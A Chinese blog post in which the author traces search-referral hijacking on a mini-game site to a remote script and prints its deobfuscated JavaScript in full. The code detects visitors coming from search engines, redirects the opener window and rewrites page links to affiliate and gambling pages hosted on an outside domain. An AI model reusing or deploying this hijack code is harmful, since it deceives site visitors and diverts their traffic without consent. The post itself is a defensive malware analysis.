看07073对搜索页面劫持

|Font Size: | No Comments | Previous

  昨天晚上打开flash.07073.com的时候会跳到一个博彩的网站。开始的时候并没在意,小游戏网广告多也算正常吧。后来发现只要是从Google搜索结果点过来链接全部都会跳到这个博彩网站,偶尔还会跳到天猫、paipai、一号店,都是推广链接。

  我开始还以为是Chrome又安装了恶意插件,检查一番确定不是浏览器问题,也不会是木马。难道是搜索页面劫持

  查看网站源码,在 /images/images.js 发现了referrer代码。

  这段代码很快就被删除了。但是我的浏览器从搜索引擎过去还会跳转到其他网站。继续找:

  这里调用s.tkurl.com上的js:

  s.tkurl.com/navigatoral.js 使用eval的方式加密了javascript代码:

  解密后:

if ("undefined" == typeof(_5had0w)) {
    _5had0w = [];
    _5had0w.ssite = new RegExp("(www.baidu.com)|(www.google.c)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(soso.com)|(sososnap.com)|(sogou.com)|(so.360.cn)|(hao.360.cn)|(www.so.com)|(360webcache.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baike.baidu.com)|(tieba.baidu.com)|(qzone.qq.com)|(t.qq.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
    _5had0w.win = window;
    try {
        if (parent && parent.f && parent.document.getElementById("fulliframe")) {
            _5had0w.win = parent
        }
    } catch(e) {}
    _5had0w.host = _5had0w.win.location.host;
    if (!_5had0w.host) _5had0w.host = "";
    _5had0w.getcookie = function(sName) {
        var aCookie = document.cookie.split("; ");
        for (var i = 0; i < aCookie.length; i++) {
            var aCrumb = aCookie[i].split("=");
            if (sName == aCrumb[0]) return unescape(aCrumb[1])
        }
        return ""
    };
    _5had0w.setcookie = function(sValue) {
        date = new Date();
        date.setMinutes(date.getMinutes() + 6);
        document.cookie = "oc_busy=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
    };
    _5had0w.hcode = _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charCodeAt(0);
    if (isNaN(_5had0w.hcode)) _5had0w.hcode = 0;
    _5had0w.mall = "htt" + "p://s.t" + "kur" + "l.c" + "om/gom" + "alls.ht" + "ml?";
    _5had0w.dd = new Date();
    _5had0w.powerboom = function() {
        try {
            var urlp = _5had0w.mall + "p0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html";
            if (document.attachEvent) {
                _5had0w.pnode.launchURL(urlp);
                _5had0w.pnode = null;
                self.focus()
            }
        } catch(e) {}
    };
    _5had0w.nvPower = function() {
        try {
            if (document.attachEvent) {
                _5had0w.pnode = document.createElement("");
                window.attachEvent("onunload", _5had0w.powerboom)
            }
        } catch(e) {}
    };
    _5had0w.detachPower = function() {
        try {
            if (window.detachEvent) {
                _5had0w.pnode = null;
                window.detachEvent("onunload", _5had0w.powerboom)
            }
        } catch(e) {}
    };
    _5had0w.nvEnter = function() {
        _5had0w.detachPower();
        _5had0w.setcookie("_mall");
        _5had0w.win.location = _5had0w.mall + "e0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html"
    };
    _5had0w.shadowClick = function() {
        setTimeout(_5had0w.nvEnter, 1500);
        return true
    };
    _5had0w.np = false;
    _5had0w.nvIt = function(lochref) {
        try {
            _5had0w.win.opener.location = lochref
        } catch(e) {
            try {
                _5had0w.win.opener.navigate(lochref)
            } catch(e2) {
                try {
                    _5had0w.win.opener.opener.navigate(lochref)
                } catch(e3) {
                    _5had0w.nvPower();
                    _5had0w.np = true
                }
            }
        }
    };
    _5had0w.nvUrl = function() {
        var _co = _5had0w.getcookie("oc_busy");
        if (_co == "" || _co.indexOf("mall") < 0) {
            _5had0w.nvIt(_5had0w.mall + "n0" + (_5had0w.dd.getMonth() + 1) + "" + _5had0w.dd.getDate() + ".html");
            if (!_5had0w.np) {
                _5had0w.setcookie(_co + "_mall")
            }
        }
    };
    if (_5had0w.win.opener) {
        if (_5had0w.ssite.test(_5had0w.win.document.referrer)) {
            _5had0w.nvUrl()
        }
    }
    _5had0w.appendChild = function(html) {
        var node = document.createElement("DIV");
        node.style.width = "0";
        node.style.height = "0";
        node.style.position = "absolute";
        node.style.left = "-100px";
        node.innerHTML = html;
        document.body.appendChild(node)
    };
    _5had0w.appendScript = function() {
        if (1 > arguments.length) return;
        var node = document.createElement("DIV");
        node.style.width = "0";
        node.style.height = "0";
        node.style.position = "absolute";
        node.style.left = "-100px";
        for (var i = 0; i < arguments.length; i++) node.appendChild(document.createElement('script')).src = arguments[i];
        document.body.appendChild(node)
    };
    _5had0w.oload = function() {
        if (document.body == null) {
            setTimeout(_5had0w.oload, 200)
        } else {
            var fp = "htt" + "p://s.t" + "kur" + "l.c" + "om/bro" + "adp.s" + "wf";
            var pm = "d=" + _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charAt(0);
            try {
                if ((!document.attachEvent) || navigator.userAgent.indexOf("Opera") > -1) {
                    pm += "&b=ff"
                }
            } catch(e) {}
            var str = '';
            _5had0w.appendChild(str);
            if (_5had0w.np) {
                var ls = document.links;
                if (ls.length && ls.length > 0) {
                    for (var i = 0; i < ls.length; i++) {
                        if (ls[i].href.indexOf("javascript") < 0) {
                            ls[i].target = "_blank";
                            ls[i].onclick = _5had0w.shadowClick
                        }
                    }
                }
            }
        }
    };
    try {
        if (document.attachEvent) {
            window.attachEvent("onload", _5had0w.oload)
        } else {
            window.addEventListener("load", _5had0w.oload, false)
        }
    } catch(e) {}
}
 

  没必要故意这么做吧?

  本文结束。

Leave a comment